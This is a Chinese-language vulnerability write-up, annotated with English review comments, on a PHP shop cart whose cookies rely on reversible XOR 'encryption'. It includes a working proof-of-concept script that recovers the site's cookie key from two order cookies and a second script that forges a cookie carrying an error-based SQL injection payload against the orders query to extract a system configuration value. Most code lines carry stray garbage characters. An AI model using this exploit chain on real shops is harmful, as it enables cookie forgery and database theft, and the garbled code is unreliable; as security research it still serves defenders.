www.xxx.com/plus/search.php?keyword=
在 include/shopcar.class.php 中，
先看一下这个 shopcar 类是如何生成 cookie 的：
// NOTE(review): the value is passed through enCrypt() before being set, but neither this
// method nor enCrypt()/setKey() below attaches an integrity tag, so the server cannot tell
// a client-minted cookie from one it issued. The defensive fix is a keyed MAC (hash_hmac)
// over the payload, verified on read; the XOR layer alone is obfuscation, not authentication.
239 function saveCookie($key,$value)7 [& y) m, \: @
240 {
8 T0 @4 d: {. f* O( |! A5 q241 if(is_array($value))% _9 f6 G8 _% g5 U% U2 l, l
242 {
// arrays are first flattened to a query-string form by enCode() (not shown here)
b( Q W5 X% S5 n$ C243 $value = $this->enCrypt($this->enCode($value));& M( X1 [; y1 R) d; i
244 }3 ]2 B- ^% h- d5 U
245 else: q1 a" p& {% w2 U% Q% W0 N% S
246 {
$ d, O& Q& p! |2 g. w247 $value = $this->enCrypt($value);
+ e; t2 R# w! w2 F1 b9 @248 }& {; E g: D' `
// 36000 s (10 h) lifetime, path "/"; no httponly/secure flags are passed here
249 setcookie($key,$value,time()+36000,’/');
( B8 H! w8 k$ k) e) S# T250 } U) K* D3 \9 ^1 P4 H, z
简单地说，$key 就是 cookie 的 key，$value 就是 value；enCode 的作用是将 array 类型转变为 a=yy&b=cc&d=know 这样的形式，关键是 enCrypt 函数：
// NOTE(review): per-cookie key derivation. srand()/rand(0, 32000) yields at most 32001
// distinct $encrypt_key values and rand() is not a CSPRNG, so the key is enumerable offline.
// The loop below also copies each raw key character into $tmp beside the byte it XORs, so
// the "encrypted" stream carries its own key material. Mitigation: random_bytes()/random_int()
// for key material, and replace this construction with an authenticated one (hash_hmac).
186 function enCrypt($txt)3 M7 F/ R& Q6 ^- I" I/ R8 U
187 {
" G" w3 v a* v# f188 srand((double)microtime() * 1000000);
( z$ K8 |9 m" ^4 m# A+ e0 h189 $encrypt_key = md5(rand(0, 32000));
- }1 {0 a9 D" I; [% H* R2 R5 [+ ^" c190 $ctr = 0;% S2 |) ?' Y6 T" K! v! |+ r; _/ H/ q& I
191 $tmp = ”;3 Y+ N; [ a" T8 H
192 for($i = 0; $i < strlen($txt); $i++); N) M9 c% d* }
193 {5 z) B9 L, d5 u' I3 E
// wrap $ctr at the 32-char md5 key length (repeating-key XOR)
194 $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
5 n) E# \# [1 x195 $tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);; R* V; }3 T, [, B
196 }% N& C+ H/ A9 n6 ]1 k q
// second XOR layer with the site-wide key, then base64 for the cookie
197 return base64_encode($this->setKey($tmp));# L, x$ g* b' i2 s: {. `
198 }8 e2 X: c! u. k/ x8 w$ o
// NOTE(review): site-wide layer: repeating-key XOR with md5(strtolower($cfg_cookie_encode)).
// XOR is its own inverse, so a single known (input, output) pair of 32+ bytes reveals the
// whole key, after which any cookie can be forged; strtolower() additionally shrinks the
// effective key space. The site secret should be used as a hash_hmac key (verified with
// hash_equals() on read), never as an XOR pad.
213 function setKey($txt)+ c9 U" ~% ?2 I) {1 P# \
214 { R& a) {6 X3 ^/ G
215 global $cfg_cookie_encode;
8 E d& Z7 u3 @: H; n216 $encrypt_key = md5(strtolower($cfg_cookie_encode));" H: U" G( m" `6 {9 a5 T
217 $ctr = 0;' F) V$ }: i' V: i! ~. H- L
218 $tmp = ”;% X/ i9 ] h5 P) |. v; ?) Q
219 for($i = 0; $i < strlen($txt); $i++)
' Q+ M; E( b/ v: a5 F5 K9 ~1 S% T6 N* ]220 {6 P) s7 P6 j0 X/ ]& A
// wrap $ctr at the 32-char md5 key length
221 $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
) X# C; {; M4 }# B8 k5 e222 $tmp .= $txt[$i] ^ $encrypt_key[$ctr++];
/ y( J& u, P) {3 Z223 }
' |5 Z* ^' v7 ?2 K224 return $tmp;
6 z! u) v! o( v( i# n, [( b+ B3 S225 }7 T/ U" K2 K6 f& u6 b
enCrypt 的参数 $txt 我们是可知的，返回值就是 cookie 的值，这个我们也是可知的。
然后到了 enCrypt 调用 setKey 时的参数 $tmp，这个参数在某种意义上我们也是可知的：因为 $encrypt_key = md5(rand(0, 32000)); 只有 32000 种可能，我们可以推出 32000 种可能的 $tmp，从而推出 32000 种可能的 md5(strtolower($cfg_cookie_encode))。对了，忘记说了，我们的目的是推测出 setKey 中 $encrypt_key 的值，然后才能任意构造出购物车的 cookie。从推出的 32000 种 md5(strtolower($cfg_cookie_encode)) 中，简单过滤掉含非字母数字字符的 key，就只剩下几百个可能的 key；然后我们重新下一次订单，再获取几百个可能的 key，两者取交集，得到最终 key。
具体代码如下：
<?php
// PoC inputs from the post: two cookies issued by saveCookie() for the same known
// plaintext, plus that plaintext. The check below works only because enCrypt()'s
// per-cookie key is drawn from rand(0, 32000); an unpredictable key plus a MAC would
// leave nothing to enumerate.
0 J5 ^* @! E4 g8 C( v$cookie1 = “X2lRPFNlCmlWc1cvAHNXMABjAToHbVcyB3ZXJFIwA20LIAlzU2ULPARyAmQGIVU5VyJbfFVsBiYNN1dsUG0DIl90UTFTLAo3VjBXYgBvVzgAZAEqBz9XagclVzBSbw==”; // here is the first cookie,change here
5 g k9 }2 S; k7 t$cookie2 = “ADYCb1RiBmUDJghwUyAFYlIxW2BROwhtVCUIe1AyC2UOJVMpADYBNgJ0AmRUcw5iAncAJ1JrCSlQalBrAj8CIwArAmJUKwY7A2UIPVM8BWpSNltwUWkINVR2CG9QbQ==”; // here is the second cookie ,change here
5 A2 m. D/ x0 C' T; f$plantxt = “id=2&price=0&units=fun&buynum=1&title=naduohua1″; // here is the text , change here
// Recovers the first 32 bytes of setKey()'s XOR pad from one (input, output) pair.
// This is possible only because XOR with a fixed key is its own inverse — the root
// cause a MAC-based cookie scheme would remove.
6 M( x* W7 X- N8 ^function reStrCode($code,$string)
4 j0 d. Y* J0 X{
. e8 b0 `- v- i1 Q5 N$code = base64_decode($code);7 @: w6 l t9 z- h% ~/ g/ K
$key = “”;
// 32 = length of an md5 hex digest, i.e. the pad length used by setKey()
( i- U2 B3 b. `( Ffor($i=0 ; $i<32 ; $i++)& x3 a9 O# d5 q& a2 A, h
{1 S7 _9 L' @* v- f, J' Q5 J
$key .= $string[$i] ^ $code[$i];
( p& P. B/ i; d2 Y% y}0 N' P( E4 N/ e
return $key;, S7 l- H' H" T8 A
}4 K* R8 J |1 O
// Walks the md5(rand(0, 32000)) candidates enCrypt() can pick, rebuilds the intermediate
// $tmp for the known plaintext with the same interleaving loop as enCrypt(), and keeps
// the pad candidates that look like hex digests. What this demonstrates for defenders:
// a ~2^15 per-cookie key space combined with a reversible master-key layer.
// eregi() was removed in PHP 7, so this script runs on PHP 5 only.
function getKeys($cookie,$plantxt)
. d7 m1 Y! b ~{
4 B( K" E: w; c; X' G$ M$tmp = $cookie;( [$ x9 C; z U' Y, L" W; W9 a" ?
$results = array();6 ^ | K4 W4 `6 b7 p/ h1 P" C
for($j=0 ; $j < 32000; $j++)$ B/ ^5 X, e. y# p% X w
{6 |% K9 j$ T& J9 F u
4 b/ b1 r K0 t9 s+ D
$txt = $plantxt;% h0 Z* l& _7 a( Z6 G
$ctr = 0;
& J2 }! E: i9 U& j; G: t/ p+ t$tmp = ”;1 S# ]8 g$ r" _$ L. P
// same derivation as enCrypt(): md5 of the integer rand() would have returned
$encrypt_key = md5($j);
, m+ @2 [: }' L$ a( o8 yfor($i =0; $i < strlen($txt); $i ++)8 R- J# e" M B4 P' W5 a
{
/ ?( z. v1 j2 I0 p' Y+ a0 m$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;; s' `( N9 G# P i: Q
$tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);, q% I$ x! y1 f
}' i1 @, O7 o+ K( i
$string = $tmp;
" q: s5 d$ t* l) }3 ?0 l% T4 h8 f$code = $cookie;! d' x* K# a0 S" X$ L9 o+ Z* N
$result = reStrCode($code,$string);5 T# n& e- O5 D2 `0 p& D5 q. r
// keep only candidates that could be an md5 hex string (alphanumeric, case-insensitive)
if(eregi(‘^[a-z0-9]+$’,$result))
0 R3 m6 e3 p% o{
5 c+ j, v8 }) W m) recho $result.”\n”;% z6 l8 G- @' P" C% d& @7 P. B
$results[] = $result;
( C& b; z0 E @0 ^& u}& U( I* a/ I8 c$ r: O9 @4 ^8 V
}
; R4 W6 m7 }/ o2 ?return $results;* n" r- u$ }, i+ m* W5 C. ^9 u$ f
}+ t5 H0 s( }. n# v+ g
// Intersects the candidate sets obtained from two independently issued cookies; the
// site pad is the value common to both.
$results1 = getKeys($cookie1,$plantxt);
3 ~+ Z" N+ T0 x% i4 {6 f! d- z% T$results2 = getKeys($cookie2,$plantxt);
# M4 G' g0 Q/ @* o& l q# [$ vprint “\n——————–real key————————–\n”;5 i9 ]! j3 Q& ]5 u
foreach($results1 as $test1)
. M) ~) t' g( Q( k{
6 @# B1 [8 H% [$ i2 M2 r9 N$ w, xforeach($results2 as $test2)
8 z( K5 Z U2 n8 A! T+ M8 V- r$ v7 t{
, N; w- N0 t0 T; s0 P9 Kif($test1 == $test2) a/ [7 U& O+ U( u
{) C. s1 i7 C1 M2 l; N
echo $test1.”\n”;
& Q8 o$ W9 n: F$ u) X}
. D9 d" b/ Z9 }# y- f- @}% [) M+ V7 r9 w0 [# r( F! }7 R3 W
}
0 b5 P: w! ?1 R. A. c+ f3 j?>, i( T8 U4 Z" I# j# N( E; i' q
cookie1 和 cookie2 是我下了两次订单后分别生成的 cookie，
plantxt 可以根据页面自己推算，大概就是这个格式：id=2&price=0&units=fun&buynum=1&title=naduohua1
然后推算出 md5(strtolower($cfg_cookie_encode))。
得到这个 key 之后，我们就可以构造任意购物车的 cookie。
接着看：
20 class MemberShops% z! i9 k4 q3 q1 I% x
21 {
% d* }! i3 K4 a' p0 Z- F22 var $OrdersId;$ z# j! O6 j+ z
23 var $productsId;
) [' N. ~# F; u# K& s" Y! y24 t' l( {+ {- q7 h
// NOTE(review): OrdersId is taken straight from a client cookie. getCookie() is not shown
// here — presumably the inverse of saveCookie()/enCrypt(), verify — and since the cookie
// carries no integrity check, this value is attacker-controlled and every consumer must
// validate it (cast to int / bind as a query parameter) before use.
25 function __construct()3 a0 e5 b1 i, S5 D2 s5 ]
26 {
, j6 J+ H, m% g4 f) _27 $this->OrdersId = $this->getCookie(“OrdersId”);6 @, }, ~% @ m l- b7 e: J/ \
28 if(empty($this->OrdersId))4 z1 U7 K* C/ @" C; E2 Q' q; q* t
29 {
// no usable cookie: MakeOrders() (not shown here) presumably allocates a fresh id
2 P7 b3 @/ ^) p- e. E1 E30 $this->OrdersId = $this->MakeOrders();3 ]1 w" {) [# d3 }; J0 |8 i
31 }3 R l' x* q6 x1 ]% ~7 h
32 }
发现 OrdersId 是从 cookie 里面获取的。
然后看
/plus/carbuyaction.php 中的：
// NOTE(review): $OrdersId originates from the client cookie (MemberShops::__construct)
// and is interpolated into the SQL string at line 173 below; no escaping is visible
// between line 39 and line 173 (those lines are not shown). The cookie's XOR obfuscation
// is not an integrity check, so this query is reachable with attacker-chosen input.
// Mitigation: bind oid as a prepared-statement parameter, or cast to int if it is numeric.
29 $cart = new MemberShops(); d/ W) L! K# ^& k5 R
39 $OrdersId = $cart->OrdersId; // order id recorded for this request
" {1 {/ f: p+ _; b( _1 R8 A……2 Z% G# Y f, c5 k( A( K
173 $rows = $dsql->GetOne(“SELECT `oid` FROM #@__shops_orders WHERE oid=’$OrdersId’ LIMIT 0,1″);
接着我们就可以注入了，
利用下面的代码生成 cookie：
' b9 H) j9 F \/ v8 i<?php/ V0 B% P' j) g$ d( a8 g% C, E' j
// NOTE(review): $txt is the SQL-injection payload for the unparameterised oid lookup in
// carbuyaction.php (line 173 in the excerpt above). A prepared statement, or an integer
// cast of $OrdersId, neutralises it regardless of whether the cookie pad is known.
$txt = “1′ or 1=@`\’` and (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(substring((select value from #@__sysconfig where aid=3),1,62)))a from information_schema.tables group by a)b) or 1=@`\’` or ’1′=’1″;
// the site pad recovered by the first script (md5(strtolower($cfg_cookie_encode)))
2 [" n o V& \& C2 R+ U3 q$encrypt_key = “9f09293b7419ed68448fb51d5b174834″; // here is the key, please change here& Z1 w% @, N$ A3 y# N _
// Local copy of shopcar.class.php's setKey(): identical loop, but the pad comes from the
// script-level $encrypt_key instead of md5(strtolower($cfg_cookie_encode)). That a
// 32-char pad is all it takes is the defect: the site secret should key a MAC, not an XOR.
function setKey($txt)" \9 G3 W+ r$ W, G# b8 E: p6 ?
{1 W! m/ y; g% e& B/ ?% O" ^) C
global $encrypt_key;
5 B* I" b ~& a- @* X$ctr = 0;2 c [& b9 _4 C1 h9 w# _% `* Z
$tmp = ”;
% X9 U: P& R' u. ~# U& v# Ufor($i = 0; $i < strlen($txt); $i++)
. t6 c- L; k9 K7 o{
7 T" T# l& ~) G# f$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
[+ s3 M9 J: J$tmp .= $txt[$i] ^ $encrypt_key[$ctr++];4 x) }' X4 r6 S* [! ~
}
( n! I4 A1 q9 a+ z; ereturn $tmp;7 O; f _- o; x% i) f! A- e7 l: _0 A8 g
}/ S! a/ @9 n7 N$ F3 q
// Local copy of shopcar.class.php's enCrypt(). The random per-cookie key chosen here is
// irrelevant to the result's acceptance by the server, because the outer setKey() layer
// is invertible and the server performs no integrity check on what it reads back.
function enCrypt($txt)- h } u+ U6 {2 f
{
4 ?8 H9 t, e/ E" z1 ]7 ^8 |6 zsrand((double)microtime() * 1000000);# g3 I2 p) z& ^7 w0 F; w
$encrypt_key = md5(rand(0, 32000));( B- P+ q! n; h/ `7 h8 H2 c
$ctr = 0;
0 m/ l* R8 T- J' B$tmp = ”;7 Z% \8 o7 Z. Z
for($i = 0; $i < strlen($txt); $i++)( M& z! n8 ^2 B
{
& X3 k: u: Y: }; }$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
# E5 o- j8 c) @$tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);
3 z' ]' @3 S* G/ d/ Z5 ?# U}
// outer layer uses the script-level setKey() (global $encrypt_key), not the class one
1 C0 ^9 w: v! A$ m) zreturn base64_encode(setKey($tmp));
, P6 y& z5 R* ~0 }}
// Loop condition is an assignment: it keeps re-encoding while enCrypt() returns a
// non-empty string, and stops at the first output without a '+' (the script's own
// acceptance rule; the post does not say why).
2 {) Q, J9 p4 P3 N5 Gfor($dest =0;$dest = enCrypt($txt);)
! K; ?( s* J# n" F% [, S) D% _{5 W7 c7 [2 ]$ c6 K3 y8 q! B
if(!strpos($dest,’+'))
T" `$ T3 E& R9 h3 g- I/ f# Q{
: s6 H8 |& P: Y0 L2 Gbreak;
3 @2 L) M1 y" A0 V! V0 ~3 G}3 G% v' ~- g) ]' ~$ ?
}. W2 r$ k/ K5 i. n, N
echo $dest.”\n”;
+ d* q8 W' C( I. L- J?>8 G# z3 n( j2 l- ^* g0 ?! g; U1 b
9 ~7 P* R" Z9 }% }8 L) [ |